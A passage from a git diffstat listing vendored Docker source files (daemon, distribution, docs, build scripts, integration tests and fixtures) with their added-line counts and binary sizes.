.../docker/docker/daemon/image_push.go | 63 + .../docker/docker/daemon/image_tag.go | 37 + .../github.com/docker/docker/daemon/images.go | 331 + .../github.com/docker/docker/daemon/import.go | 135 + .../github.com/docker/docker/daemon/info.go | 180 + .../docker/docker/daemon/info_unix.go | 82 + .../docker/docker/daemon/info_windows.go | 10 + .../docker/daemon/initlayer/setup_solaris.go | 13 + .../docker/daemon/initlayer/setup_unix.go | 69 + .../docker/daemon/initlayer/setup_windows.go | 13 + .../docker/docker/daemon/inspect.go | 264 + .../docker/docker/daemon/inspect_solaris.go | 41 + .../docker/docker/daemon/inspect_unix.go | 92 + .../docker/docker/daemon/inspect_windows.go | 41 + .../github.com/docker/docker/daemon/keys.go | 59 + .../docker/docker/daemon/keys_unsupported.go | 8 + .../github.com/docker/docker/daemon/kill.go | 164 + .../github.com/docker/docker/daemon/links.go | 87 + .../docker/docker/daemon/links/links.go | 141 + .../docker/docker/daemon/links/links_test.go | 213 + .../docker/docker/daemon/links_linux.go | 72 + .../docker/docker/daemon/links_linux_test.go | 98 + .../docker/docker/daemon/links_notlinux.go | 10 + .../github.com/docker/docker/daemon/list.go | 660 ++ .../docker/docker/daemon/list_unix.go | 11 + .../docker/docker/daemon/list_windows.go | 20 + .../docker/docker/daemon/logdrivers_linux.go | 15 + .../docker/daemon/logdrivers_windows.go | 13 + .../daemon/logger/awslogs/cloudwatchlogs.go | 404 + .../logger/awslogs/cloudwatchlogs_test.go | 724 ++ .../logger/awslogs/cwlogsiface_mock_test.go | 77 + .../docker/docker/daemon/logger/context.go | 111 + .../docker/docker/daemon/logger/copier.go | 131 + .../docker/daemon/logger/copier_test.go | 296 + .../daemon/logger/etwlogs/etwlogs_windows.go | 170 + .../docker/docker/daemon/logger/factory.go | 104 + .../docker/daemon/logger/fluentd/fluentd.go | 246 + .../daemon/logger/gcplogs/gcplogging.go | 200 + .../docker/docker/daemon/logger/gelf/gelf.go | 209 + .../daemon/logger/gelf/gelf_unsupported.go | 3 + .../docker/daemon/logger/journald/journald.go | 122 + .../daemon/logger/journald/journald_test.go | 23 + .../logger/journald/journald_unsupported.go | 6 + .../docker/daemon/logger/journald/read.go | 401 + .../daemon/logger/journald/read_native.go | 6 + .../logger/journald/read_native_compat.go | 6 + .../logger/journald/read_unsupported.go | 7 + .../daemon/logger/jsonfilelog/jsonfilelog.go | 151 + .../logger/jsonfilelog/jsonfilelog_test.go | 248 + .../docker/daemon/logger/jsonfilelog/read.go | 319 + .../daemon/logger/logentries/logentries.go | 94 + .../docker/docker/daemon/logger/logger.go | 134 + .../docker/daemon/logger/logger_test.go | 26 + .../daemon/logger/loggerutils/log_tag.go | 31 + .../daemon/logger/loggerutils/log_tag_test.go | 47 + .../logger/loggerutils/rotatefilewriter.go | 124 + .../docker/daemon/logger/splunk/splunk.go | 621 ++ .../daemon/logger/splunk/splunk_test.go | 1302 +++ .../logger/splunk/splunkhecmock_test.go | 157 + .../docker/daemon/logger/syslog/syslog.go | 262 + .../daemon/logger/syslog/syslog_test.go | 62 + .../github.com/docker/docker/daemon/logs.go | 142 + .../docker/docker/daemon/logs_test.go | 15 + .../docker/docker/daemon/metrics.go | 42 + .../docker/docker/daemon/monitor.go | 132 + .../docker/docker/daemon/monitor_linux.go | 19 + .../docker/docker/daemon/monitor_solaris.go | 18 + .../docker/docker/daemon/monitor_windows.go | 46 + .../github.com/docker/docker/daemon/mounts.go | 48 + .../github.com/docker/docker/daemon/names.go | 116 + .../docker/docker/daemon/network.go | 498 ++ .../docker/docker/daemon/network/settings.go | 33 + .../docker/docker/daemon/oci_linux.go | 790 ++ .../docker/docker/daemon/oci_solaris.go | 188 + .../docker/docker/daemon/oci_windows.go | 122 + .../github.com/docker/docker/daemon/pause.go | 49 + .../github.com/docker/docker/daemon/prune.go | 236 + .../github.com/docker/docker/daemon/rename.go | 122 + .../github.com/docker/docker/daemon/resize.go | 40 + .../docker/docker/daemon/restart.go | 70 + .../github.com/docker/docker/daemon/search.go | 94 + .../docker/docker/daemon/search_test.go | 358 + .../docker/docker/daemon/seccomp_disabled.go | 19 + .../docker/docker/daemon/seccomp_linux.go | 55 + .../docker/daemon/seccomp_unsupported.go | 5 + .../docker/docker/daemon/secrets.go | 36 + .../docker/docker/daemon/secrets_linux.go | 7 + .../docker/daemon/secrets_unsupported.go | 7 + .../docker/docker/daemon/selinux_linux.go | 17 + .../docker/daemon/selinux_unsupported.go | 13 + .../github.com/docker/docker/daemon/start.go | 230 + .../docker/docker/daemon/start_unix.go | 31 + .../docker/docker/daemon/start_windows.go | 205 + .../github.com/docker/docker/daemon/stats.go | 158 + .../docker/docker/daemon/stats_collector.go | 132 + .../docker/daemon/stats_collector_solaris.go | 34 + .../docker/daemon/stats_collector_unix.go | 71 + .../docker/daemon/stats_collector_windows.go | 15 + .../docker/docker/daemon/stats_unix.go | 58 + .../docker/docker/daemon/stats_windows.go | 11 + .../github.com/docker/docker/daemon/stop.go | 83 + .../docker/docker/daemon/top_unix.go | 126 + .../docker/docker/daemon/top_unix_test.go | 76 + .../docker/docker/daemon/top_windows.go | 53 + .../docker/docker/daemon/unpause.go | 38 + .../github.com/docker/docker/daemon/update.go | 92 + .../docker/docker/daemon/update_linux.go | 25 + .../docker/docker/daemon/update_solaris.go | 11 + .../docker/docker/daemon/update_windows.go | 13 + .../docker/docker/daemon/volumes.go | 303 + .../docker/docker/daemon/volumes_unit_test.go | 39 + .../docker/docker/daemon/volumes_unix.go | 219 + .../docker/docker/daemon/volumes_windows.go | 47 + .../github.com/docker/docker/daemon/wait.go | 32 + .../docker/docker/daemon/workdir.go | 21 + .../docker/docker/distribution/config.go | 241 + .../docker/docker/distribution/errors.go | 159 + .../fixtures/validate_manifest/bad_manifest | 38 + .../validate_manifest/extra_data_manifest | 46 + .../fixtures/validate_manifest/good_manifest | 38 + .../docker/distribution/metadata/metadata.go | 75 + .../distribution/metadata/v1_id_service.go | 51 + .../metadata/v1_id_service_test.go | 83 + .../metadata/v2_metadata_service.go | 241 + .../metadata/v2_metadata_service_test.go | 115 + .../docker/docker/distribution/pull.go | 200 + .../docker/docker/distribution/pull_v1.go | 368 + .../docker/docker/distribution/pull_v2.go | 878 ++ .../docker/distribution/pull_v2_test.go | 183 + .../docker/distribution/pull_v2_unix.go | 13 + .../docker/distribution/pull_v2_windows.go | 49 + .../docker/docker/distribution/push.go | 186 + .../docker/docker/distribution/push_v1.go | 463 + .../docker/docker/distribution/push_v2.go | 697 ++ .../docker/distribution/push_v2_test.go | 579 ++ .../docker/docker/distribution/registry.go | 156 + .../docker/distribution/registry_unit_test.go | 136 + .../docker/distribution/utils/progress.go | 44 + .../docker/distribution/xfer/download.go | 452 + .../docker/distribution/xfer/download_test.go | 356 + .../docker/distribution/xfer/transfer.go | 401 + .../docker/distribution/xfer/transfer_test.go | 410 + .../docker/docker/distribution/xfer/upload.go | 168 + .../docker/distribution/xfer/upload_test.go | 134 + .../docker/docker/dockerversion/useragent.go | 74 + .../docker/dockerversion/version_lib.go | 16 + .../github.com/docker/docker/docs/README.md | 30 + .../docker/docker/docs/api/v1.18.md | 2156 +++++ .../docker/docker/docs/api/v1.19.md | 2238 +++++ .../docker/docker/docs/api/v1.20.md | 2391 +++++ .../docker/docker/docs/api/v1.21.md | 2969 +++++++ .../docker/docker/docs/api/v1.22.md | 3307 +++++++ .../docker/docker/docs/api/v1.23.md | 3424 ++++++++ .../docker/docker/docs/api/v1.24.md | 5316 +++++++++++ .../docker/docker/docs/api/version-history.md | 249 + .../docker/docker/docs/deprecated.md | 286 + .../docker/docker/docs/extend/EBS_volume.md | 164 + .../docker/docker/docs/extend/config.md | 225 + .../extend/images/authz_additional_info.png | Bin 0 -> 45916 bytes .../docker/docs/extend/images/authz_allow.png | Bin 0 -> 33505 bytes .../docs/extend/images/authz_chunked.png | Bin 0 -> 33168 bytes .../extend/images/authz_connection_hijack.png | Bin 0 -> 38780 bytes .../docker/docs/extend/images/authz_deny.png | Bin 0 -> 27099 bytes .../docker/docker/docs/extend/index.md | 222 + .../docker/docs/extend/legacy_plugins.md | 98 + .../docker/docker/docs/extend/plugin_api.md | 196 + .../docs/extend/plugins_authorization.md | 260 + .../docker/docs/extend/plugins_graphdriver.md | 376 + .../docker/docs/extend/plugins_network.md | 77 + .../docker/docs/extend/plugins_volume.md | 276 + .../docker/docker/docs/reference/builder.md | 1746 ++++ .../docs/reference/commandline/attach.md | 131 + .../docs/reference/commandline/build.md | 451 + .../docker/docs/reference/commandline/cli.md | 249 + .../docs/reference/commandline/commit.md | 93 + .../reference/commandline/container_prune.md | 47 + .../docker/docs/reference/commandline/cp.md | 112 + .../docs/reference/commandline/create.md | 211 + .../docs/reference/commandline/deploy.md | 101 + .../docker/docs/reference/commandline/diff.md | 48 + .../reference/commandline/docker_images.gif | Bin 0 -> 35785 bytes .../docs/reference/commandline/dockerd.md | 1364 +++ .../docs/reference/commandline/events.md | 217 + .../docker/docs/reference/commandline/exec.md | 65 + .../docs/reference/commandline/export.md | 43 + .../docs/reference/commandline/history.md | 48 + .../docs/reference/commandline/image_prune.md | 71 + .../docs/reference/commandline/images.md | 304 + .../docs/reference/commandline/import.md | 75 + .../docs/reference/commandline/index.md | 178 + .../docker/docs/reference/commandline/info.md | 224 + .../docs/reference/commandline/inspect.md | 102 + .../docker/docs/reference/commandline/kill.md | 34 + .../docker/docs/reference/commandline/load.md | 53 + .../docs/reference/commandline/login.md | 122 + .../docs/reference/commandline/logout.md | 30 + .../docker/docs/reference/commandline/logs.md | 66 + .../docker/docs/reference/commandline/menu.md | 28 + .../reference/commandline/network_connect.md | 100 + .../reference/commandline/network_create.md | 202 + .../commandline/network_disconnect.md | 43 + .../reference/commandline/network_inspect.md | 192 + .../docs/reference/commandline/network_ls.md | 218 + .../reference/commandline/network_prune.md | 45 + .../docs/reference/commandline/network_rm.md | 59 + .../docs/reference/commandline/node_demote.md | 42 + .../reference/commandline/node_inspect.md | 137 + .../docs/reference/commandline/node_ls.md | 130 + .../reference/commandline/node_promote.md | 41 + .../docs/reference/commandline/node_ps.md | 107 + .../docs/reference/commandline/node_rm.md | 73 + .../docs/reference/commandline/node_update.md | 71 + .../docs/reference/commandline/pause.md | 40 + .../reference/commandline/plugin_create.md | 60 + .../reference/commandline/plugin_disable.md | 66 + .../reference/commandline/plugin_enable.md | 65 + .../reference/commandline/plugin_inspect.md | 164 + .../reference/commandline/plugin_install.md | 71 + .../docs/reference/commandline/plugin_ls.md | 53 + .../docs/reference/commandline/plugin_push.md | 50 + .../docs/reference/commandline/plugin_rm.md | 56 + .../docs/reference/commandline/plugin_set.md | 99 + .../reference/commandline/plugin_upgrade.md | 84 + .../docker/docs/reference/commandline/port.md | 41 + .../docker/docs/reference/commandline/ps.md | 384 + .../docker/docs/reference/commandline/pull.md | 252 + .../docker/docs/reference/commandline/push.md | 75 + .../docs/reference/commandline/rename.md | 27 + .../docs/reference/commandline/restart.md | 26 + .../docker/docs/reference/commandline/rm.md | 69 + .../docker/docs/reference/commandline/rmi.md | 83 + .../docker/docs/reference/commandline/run.md | 732 ++ .../docker/docs/reference/commandline/save.md | 45 + .../docs/reference/commandline/search.md | 134 + .../reference/commandline/secret_create.md | 90 + .../reference/commandline/secret_inspect.md | 85 + .../docs/reference/commandline/secret_ls.md | 43 + .../docs/reference/commandline/secret_rm.md | 48 + .../reference/commandline/service_create.md | 556 ++ .../reference/commandline/service_inspect.md | 162 + .../reference/commandline/service_logs.md | 77 + .../docs/reference/commandline/service_ls.md | 114 + .../docs/reference/commandline/service_ps.md | 161 + .../docs/reference/commandline/service_rm.md | 55 + .../reference/commandline/service_scale.md | 96 + .../reference/commandline/service_update.md | 181 + .../reference/commandline/stack_deploy.md | 98 + .../docs/reference/commandline/stack_ls.md | 47 + .../docs/reference/commandline/stack_ps.md | 51 + .../docs/reference/commandline/stack_rm.md | 38 + .../reference/commandline/stack_services.md | 70 + .../docs/reference/commandline/start.md | 28 + .../docs/reference/commandline/stats.md | 117 + .../docker/docs/reference/commandline/stop.md | 29 + .../docs/reference/commandline/swarm_init.md | 142 + .../docs/reference/commandline/swarm_join.md | 102 + .../reference/commandline/swarm_join_token.md | 105 + .../docs/reference/commandline/swarm_leave.md | 58 + .../reference/commandline/swarm_unlock.md | 41 + .../reference/commandline/swarm_unlock_key.md | 84 + .../reference/commandline/swarm_update.md | 45 + .../docs/reference/commandline/system_df.md | 76 + .../reference/commandline/system_prune.md | 79 + .../docker/docs/reference/commandline/tag.md | 74 + .../docker/docs/reference/commandline/top.md | 25 + .../docs/reference/commandline/unpause.md | 36 + .../docs/reference/commandline/update.md | 120 + .../docs/reference/commandline/version.md | 67 + .../reference/commandline/volume_create.md | 91 + .../reference/commandline/volume_inspect.md | 59 + .../docs/reference/commandline/volume_ls.md | 183 + .../reference/commandline/volume_prune.md | 54 + .../docs/reference/commandline/volume_rm.md | 42 + .../docker/docs/reference/commandline/wait.md | 25 + .../docker/docker/docs/reference/glossary.md | 286 + .../docker/docker/docs/reference/index.md | 21 + .../docker/docker/docs/reference/run.md | 1555 ++++ .../docker/docs/static_files/contributors.png | Bin 0 -> 23100 bytes .../static_files/docker-logo-compressed.png | Bin 0 -> 4972 bytes .../docker/docker/experimental/README.md | 44 + .../docker/experimental/checkpoint-restore.md | 88 + .../experimental/docker-stacks-and-bundles.md | 202 + .../experimental/images/ipvlan-l3.gliffy | 1 + .../docker/experimental/images/ipvlan-l3.png | Bin 0 -> 18260 bytes .../docker/experimental/images/ipvlan-l3.svg | 1 + .../images/ipvlan_l2_simple.gliffy | 1 + .../experimental/images/ipvlan_l2_simple.png | Bin 0 -> 20145 bytes .../experimental/images/ipvlan_l2_simple.svg | 1 + .../images/macvlan-bridge-ipvlan-l2.gliffy | 1 + .../images/macvlan-bridge-ipvlan-l2.png | Bin 0 -> 14527 bytes .../images/macvlan-bridge-ipvlan-l2.svg | 1 + .../images/multi_tenant_8021q_vlans.gliffy | 1 + .../images/multi_tenant_8021q_vlans.png | Bin 0 -> 17879 bytes .../images/multi_tenant_8021q_vlans.svg | 1 + .../images/vlans-deeper-look.gliffy | 1 + .../experimental/images/vlans-deeper-look.png | Bin 0 -> 38837 bytes .../experimental/images/vlans-deeper-look.svg | 1 + .../docker/experimental/vlan-networks.md | 471 + .../docker/hack/Jenkins/W2L/postbuild.sh | 35 + .../docker/docker/hack/Jenkins/W2L/setup.sh | 309 + .../docker/docker/hack/Jenkins/readme.md | 3 + vendor/github.com/docker/docker/hack/dind | 33 + .../docker/hack/dockerfile/binaries-commits | 11 + .../hack/dockerfile/install-binaries.sh | 123 + .../docker/docker/hack/generate-authors.sh | 15 + .../docker/hack/generate-swagger-api.sh | 22 + .../github.com/docker/docker/hack/install.sh | 484 + vendor/github.com/docker/docker/hack/make.ps1 | 408 + vendor/github.com/docker/docker/hack/make.sh | 304 + .../docker/docker/hack/make/.binary | 48 + .../docker/docker/hack/make/.binary-setup | 10 + .../docker/docker/hack/make/.build-deb/compat | 1 + .../docker/hack/make/.build-deb/control | 29 + .../.build-deb/docker-engine.bash-completion | 1 + .../.build-deb/docker-engine.docker.default | 1 + .../make/.build-deb/docker-engine.docker.init | 1 + .../.build-deb/docker-engine.docker.upstart | 1 + .../make/.build-deb/docker-engine.install | 12 + .../make/.build-deb/docker-engine.manpages | 1 + .../make/.build-deb/docker-engine.postinst | 20 + .../hack/make/.build-deb/docker-engine.udev | 1 + .../docker/docker/hack/make/.build-deb/docs | 1 + .../docker/docker/hack/make/.build-deb/rules | 55 + .../.build-rpm/docker-engine-selinux.spec | 96 + .../hack/make/.build-rpm/docker-engine.spec | 254 + .../docker/hack/make/.detect-daemon-osarch | 69 + .../docker/docker/hack/make/.ensure-emptyfs | 23 + .../docker/docker/hack/make/.go-autogen | 86 + .../docker/docker/hack/make/.go-autogen.ps1 | 91 + .../hack/make/.integration-daemon-setup | 7 + .../hack/make/.integration-daemon-start | 116 + .../docker/hack/make/.integration-daemon-stop | 27 + .../hack/make/.integration-test-helpers | 79 + .../hack/make/.resources-windows/common.rc | 38 + .../.resources-windows/docker.exe.manifest | 18 + .../hack/make/.resources-windows/docker.ico | Bin 0 -> 370070 bytes .../hack/make/.resources-windows/docker.png | Bin 0 -> 658195 bytes .../hack/make/.resources-windows/docker.rc | 3 + .../hack/make/.resources-windows/dockerd.rc | 4 + .../make/.resources-windows/event_messages.mc | 39 + .../hack/make/.resources-windows/resources.go | 18 + .../docker/docker/hack/make/README.md | 17 + .../github.com/docker/docker/hack/make/binary | 15 + .../docker/docker/hack/make/binary-client | 12 + .../docker/docker/hack/make/binary-daemon | 13 + .../docker/docker/hack/make/build-deb | 91 + .../hack/make/build-integration-test-binary | 11 + .../docker/docker/hack/make/build-rpm | 148 + .../docker/docker/hack/make/clean-apt-repo | 43 + .../docker/docker/hack/make/clean-yum-repo | 20 + .../github.com/docker/docker/hack/make/cover | 15 + .../github.com/docker/docker/hack/make/cross | 46 + .../docker/docker/hack/make/dynbinary | 15 + .../docker/docker/hack/make/dynbinary-client | 12 + .../docker/docker/hack/make/dynbinary-daemon | 12 + .../docker/hack/make/generate-index-listing | 74 + .../docker/docker/hack/make/install-binary | 12 + .../docker/hack/make/install-binary-client | 10 + .../docker/hack/make/install-binary-daemon | 16 + .../docker/docker/hack/make/install-script | 63 + .../docker/docker/hack/make/release-deb | 163 + .../docker/docker/hack/make/release-rpm | 71 + vendor/github.com/docker/docker/hack/make/run | 44 + .../docker/docker/hack/make/sign-repos | 65 + .../docker/docker/hack/make/test-deb-install | 71 + .../docker/docker/hack/make/test-docker-py | 20 + .../docker/hack/make/test-install-script | 31 + .../docker/hack/make/test-integration-cli | 28 + .../docker/hack/make/test-integration-shell | 7 + .../docker/docker/hack/make/test-old-apt-repo | 29 + .../docker/docker/hack/make/test-unit | 55 + vendor/github.com/docker/docker/hack/make/tgz | 92 + .../github.com/docker/docker/hack/make/ubuntu | 190 + .../docker/docker/hack/make/update-apt-repo | 70 + vendor/github.com/docker/docker/hack/make/win | 20 + .../github.com/docker/docker/hack/release.sh | 325 + .../docker/hack/validate/.swagger-yamllint | 4 + .../docker/docker/hack/validate/.validate | 30 + .../docker/docker/hack/validate/all | 8 + .../docker/hack/validate/compose-bindata | 28 + .../docker/docker/hack/validate/dco | 55 + .../docker/docker/hack/validate/default | 16 + .../docker/hack/validate/default-seccomp | 28 + .../docker/docker/hack/validate/gofmt | 33 + .../docker/docker/hack/validate/lint | 31 + .../docker/docker/hack/validate/pkg-imports | 33 + .../docker/docker/hack/validate/swagger | 13 + .../docker/docker/hack/validate/swagger-gen | 29 + .../docker/docker/hack/validate/test-imports | 38 + .../docker/docker/hack/validate/toml | 31 + .../docker/docker/hack/validate/vendor | 30 + .../docker/docker/hack/validate/vet | 32 + .../github.com/docker/docker/hack/vendor.sh | 15 + vendor/github.com/docker/docker/image/fs.go | 173 + .../github.com/docker/docker/image/fs_test.go | 384 + .../github.com/docker/docker/image/image.go | 150 + .../docker/docker/image/image_test.go | 59 + .../github.com/docker/docker/image/rootfs.go | 44 + .../docker/docker/image/spec/v1.1.md | 637 ++ .../docker/docker/image/spec/v1.2.md | 696 ++ .../github.com/docker/docker/image/spec/v1.md | 573 ++ .../github.com/docker/docker/image/store.go | 295 + .../docker/docker/image/store_test.go | 300 + .../docker/docker/image/tarexport/load.go | 390 + .../docker/docker/image/tarexport/save.go | 355 + .../docker/image/tarexport/tarexport.go | 47 + .../docker/docker/image/v1/imagev1.go | 156 + .../docker/docker/image/v1/imagev1_test.go | 55 + .../docker/integration-cli/benchmark_test.go | 95 + .../docker/integration-cli/check_test.go | 383 + .../docker/docker/integration-cli/daemon.go | 608 ++ .../docker/integration-cli/daemon_swarm.go | 419 + .../integration-cli/daemon_swarm_hack.go | 20 + .../docker/integration-cli/daemon_unix.go | 35 + .../docker/integration-cli/daemon_windows.go | 53 + .../integration-cli/docker_api_attach_test.go | 210 + .../integration-cli/docker_api_auth_test.go | 25 + .../integration-cli/docker_api_build_test.go | 254 + .../docker_api_containers_test.go | 1961 +++++ .../integration-cli/docker_api_create_test.go | 84 + .../integration-cli/docker_api_events_test.go | 73 + .../docker_api_exec_resize_test.go | 103 + .../integration-cli/docker_api_exec_test.go | 198 + .../integration-cli/docker_api_images_test.go | 165 + .../integration-cli/docker_api_info_test.go | 53 + .../docker_api_inspect_test.go | 183 + .../docker_api_inspect_unix_test.go | 35 + .../integration-cli/docker_api_logs_test.go | 87 + .../docker_api_network_test.go | 353 + .../integration-cli/docker_api_resize_test.go | 44 + .../docker_api_service_update_test.go | 39 + .../integration-cli/docker_api_stats_test.go | 310 + .../docker_api_stats_unix_test.go | 41 + .../integration-cli/docker_api_swarm_test.go | 1367 +++ .../docker/integration-cli/docker_api_test.go | 118 + .../docker_api_update_unix_test.go | 35 + .../docker_api_version_test.go | 23 + .../docker_api_volumes_test.go | 89 + .../integration-cli/docker_cli_attach_test.go | 168 + .../docker_cli_attach_unix_test.go | 237 + .../docker_cli_authz_plugin_v2_test.go | 133 + .../docker_cli_authz_unix_test.go | 477 + .../integration-cli/docker_cli_build_test.go | 7392 ++++++++++++++++ .../docker_cli_build_unix_test.go | 207 + .../docker_cli_by_digest_test.go | 693 ++ .../integration-cli/docker_cli_commit_test.go | 157 + .../integration-cli/docker_cli_config_test.go | 140 + .../docker_cli_cp_from_container_test.go | 488 ++ .../integration-cli/docker_cli_cp_test.go | 660 ++ .../docker_cli_cp_to_container_test.go | 599 ++ .../docker_cli_cp_to_container_unix_test.go | 39 + .../integration-cli/docker_cli_cp_utils.go | 303 + .../integration-cli/docker_cli_create_test.go | 513 ++ .../docker_cli_daemon_plugins_test.go | 317 + .../integration-cli/docker_cli_daemon_test.go | 2988 +++++++ .../integration-cli/docker_cli_diff_test.go | 98 + .../integration-cli/docker_cli_events_test.go | 794 ++ .../docker_cli_events_unix_test.go | 486 + .../integration-cli/docker_cli_exec_test.go | 601 ++ .../docker_cli_exec_unix_test.go | 93 + .../docker_cli_experimental_test.go | 36 + .../docker_cli_export_import_test.go | 49 + ...cker_cli_external_graphdriver_unix_test.go | 405 + ...er_cli_external_volume_driver_unix_test.go | 627 ++ .../integration-cli/docker_cli_health_test.go | 169 + .../integration-cli/docker_cli_help_test.go | 321 + .../docker_cli_history_test.go | 121 + .../integration-cli/docker_cli_images_test.go | 364 + .../integration-cli/docker_cli_import_test.go | 150 + .../integration-cli/docker_cli_info_test.go | 234 + .../docker_cli_info_unix_test.go | 15 + .../docker_cli_inspect_test.go | 466 + .../integration-cli/docker_cli_kill_test.go | 134 + .../integration-cli/docker_cli_links_test.go | 240 + .../docker_cli_links_unix_test.go | 26 + .../integration-cli/docker_cli_login_test.go | 44 + .../integration-cli/docker_cli_logout_test.go | 100 + .../docker_cli_logs_bench_test.go | 32 + .../integration-cli/docker_cli_logs_test.go | 328 + .../integration-cli/docker_cli_nat_test.go | 93 + .../docker_cli_netmode_test.go | 94 + .../docker_cli_network_unix_test.go | 1791 ++++ .../docker_cli_oom_killed_test.go | 30 + .../integration-cli/docker_cli_pause_test.go | 66 + .../docker_cli_plugins_test.go | 393 + .../integration-cli/docker_cli_port_test.go | 319 + .../integration-cli/docker_cli_proxy_test.go | 53 + .../docker_cli_prune_unix_test.go | 91 + .../integration-cli/docker_cli_ps_test.go | 952 ++ .../docker_cli_pull_local_test.go | 492 ++ .../integration-cli/docker_cli_pull_test.go | 274 + .../docker_cli_pull_trusted_test.go | 365 + .../integration-cli/docker_cli_push_test.go | 715 ++ .../docker_cli_registry_user_agent_test.go | 120 + .../integration-cli/docker_cli_rename_test.go | 138 + .../docker_cli_restart_test.go | 278 + .../integration-cli/docker_cli_rm_test.go | 86 + .../integration-cli/docker_cli_rmi_test.go | 352 + .../integration-cli/docker_cli_run_test.go | 4689 ++++++++++ .../docker_cli_run_unix_test.go | 1592 ++++ .../docker_cli_save_load_test.go | 383 + .../docker_cli_save_load_unix_test.go | 109 + .../integration-cli/docker_cli_search_test.go | 131 + .../docker_cli_secret_create_test.go | 131 + .../docker_cli_secret_inspect_test.go | 68 + .../docker_cli_service_create_test.go | 175 + .../docker_cli_service_health_test.go | 191 + ...cker_cli_service_logs_experimental_test.go | 96 + .../docker_cli_service_scale_test.go | 57 + .../docker_cli_service_update_test.go | 130 + .../integration-cli/docker_cli_sni_test.go | 44 + .../integration-cli/docker_cli_stack_test.go | 186 + .../integration-cli/docker_cli_start_test.go | 199 + .../integration-cli/docker_cli_stats_test.go | 159 + .../integration-cli/docker_cli_stop_test.go | 17 + .../integration-cli/docker_cli_swarm_test.go | 1254 +++ .../docker_cli_swarm_unix_test.go | 52 + .../integration-cli/docker_cli_tag_test.go | 225 + .../integration-cli/docker_cli_top_test.go | 73 + .../integration-cli/docker_cli_update_test.go | 41 + .../docker_cli_update_unix_test.go | 283 + .../integration-cli/docker_cli_userns_test.go | 98 + .../docker_cli_v2_only_test.go | 125 + .../docker_cli_version_test.go | 58 + .../integration-cli/docker_cli_volume_test.go | 427 + .../integration-cli/docker_cli_wait_test.go | 97 + .../docker_deprecated_api_v124_test.go | 227 + .../docker_deprecated_api_v124_unix_test.go | 30 + .../docker_experimental_network_test.go | 594 ++ .../docker_hub_pull_suite_test.go | 90 + .../integration-cli/docker_test_vars.go | 165 + .../docker/integration-cli/docker_utils.go | 1607 ++++ .../docker/integration-cli/events_utils.go | 206 + .../docker/docker/integration-cli/fixtures.go | 69 + .../auth/docker-credential-shell-test | 55 + .../fixtures/credentialspecs/valid.json | 25 + .../fixtures/deploy/default.yaml | 9 + .../fixtures/deploy/remove.yaml | 11 + .../fixtures/deploy/secrets.yaml | 20 + .../integration-cli/fixtures/https/ca.pem | 23 + .../fixtures/https/client-cert.pem | 73 + .../fixtures/https/client-key.pem | 16 + .../fixtures/https/client-rogue-cert.pem | 73 + .../fixtures/https/client-rogue-key.pem | 16 + .../fixtures/https/server-cert.pem | 76 + .../fixtures/https/server-key.pem | 16 + .../fixtures/https/server-rogue-cert.pem | 76 + .../fixtures/https/server-rogue-key.pem | 16 + .../fixtures/load/emptyLayer.tar | Bin 0 -> 30720 bytes .../integration-cli/fixtures/load/frozen.go | 182 + .../fixtures/notary/delgkey1.crt | 21 + .../fixtures/notary/delgkey1.key | 27 + .../fixtures/notary/delgkey2.crt | 21 + .../fixtures/notary/delgkey2.key | 27 + .../fixtures/notary/delgkey3.crt | 21 + .../fixtures/notary/delgkey3.key | 27 + .../fixtures/notary/delgkey4.crt | 21 + .../fixtures/notary/delgkey4.key | 27 + .../integration-cli/fixtures/notary/gen.sh | 18 + .../fixtures/notary/localhost.cert | 19 + .../fixtures/notary/localhost.key | 27 + .../fixtures/registry/cert.pem | 21 + .../integration-cli/fixtures/secrets/default | 1 + .../integration-cli/fixtures_linux_daemon.go | 143 + .../docker/docker/integration-cli/npipe.go | 12 + .../docker/integration-cli/npipe_windows.go | 12 + .../docker/docker/integration-cli/registry.go | 177 + .../docker/integration-cli/registry_mock.go | 55 + .../docker/integration-cli/requirements.go | 243 + .../integration-cli/requirements_unix.go | 159 + .../docker/integration-cli/test_vars.go | 11 + .../docker/integration-cli/test_vars_exec.go | 8 + .../integration-cli/test_vars_noexec.go | 8 + .../integration-cli/test_vars_noseccomp.go | 8 + .../integration-cli/test_vars_seccomp.go | 8 + .../docker/integration-cli/test_vars_unix.go | 14 + .../integration-cli/test_vars_windows.go | 15 + .../docker/integration-cli/trust_server.go | 344 + .../docker/docker/integration-cli/utils.go | 79 + .../github.com/docker/docker/layer/empty.go | 56 + .../docker/docker/layer/empty_test.go | 46 + .../docker/docker/layer/filestore.go | 354 + .../docker/docker/layer/filestore_test.go | 104 + .../github.com/docker/docker/layer/layer.go | 275 + .../docker/docker/layer/layer_store.go | 684 ++ .../docker/layer/layer_store_windows.go | 11 + .../docker/docker/layer/layer_test.go | 771 ++ .../docker/docker/layer/layer_unix.go | 9 + .../docker/docker/layer/layer_unix_test.go | 71 + .../docker/docker/layer/layer_windows.go | 98 + .../docker/docker/layer/migration.go | 256 + .../docker/docker/layer/migration_test.go | 435 + .../docker/docker/layer/mount_test.go | 230 + .../docker/docker/layer/mounted_layer.go | 99 + .../docker/docker/layer/ro_layer.go | 192 + .../docker/docker/layer/ro_layer_windows.go | 9 + .../docker/docker/libcontainerd/client.go | 46 + .../docker/libcontainerd/client_linux.go | 605 ++ .../docker/libcontainerd/client_solaris.go | 101 + .../docker/libcontainerd/client_unix.go | 142 + .../docker/libcontainerd/client_windows.go | 631 ++ .../docker/docker/libcontainerd/container.go | 13 + .../docker/libcontainerd/container_unix.go | 250 + .../docker/libcontainerd/container_windows.go | 311 + .../docker/docker/libcontainerd/oom_linux.go | 31 + .../docker/libcontainerd/oom_solaris.go | 5 + .../docker/libcontainerd/pausemonitor_unix.go | 42 + .../docker/docker/libcontainerd/process.go | 18 + .../docker/libcontainerd/process_unix.go | 107 + .../docker/libcontainerd/process_windows.go | 51 + .../docker/docker/libcontainerd/queue_unix.go | 31 + .../docker/docker/libcontainerd/remote.go | 20 + .../docker/libcontainerd/remote_unix.go | 544 ++ .../docker/libcontainerd/remote_windows.go | 36 + .../docker/docker/libcontainerd/types.go | 75 + .../docker/libcontainerd/types_linux.go | 49 + .../docker/libcontainerd/types_solaris.go | 43 + .../docker/libcontainerd/types_windows.go | 79 + .../docker/libcontainerd/utils_linux.go | 62 + .../docker/libcontainerd/utils_solaris.go | 27 + .../docker/libcontainerd/utils_windows.go | 46 + .../libcontainerd/utils_windows_test.go | 13 + .../github.com/docker/docker/man/Dockerfile | 24 + .../docker/docker/man/Dockerfile.5.md | 474 + .../docker/docker/man/Dockerfile.aarch64 | 25 + .../docker/docker/man/Dockerfile.armhf | 43 + 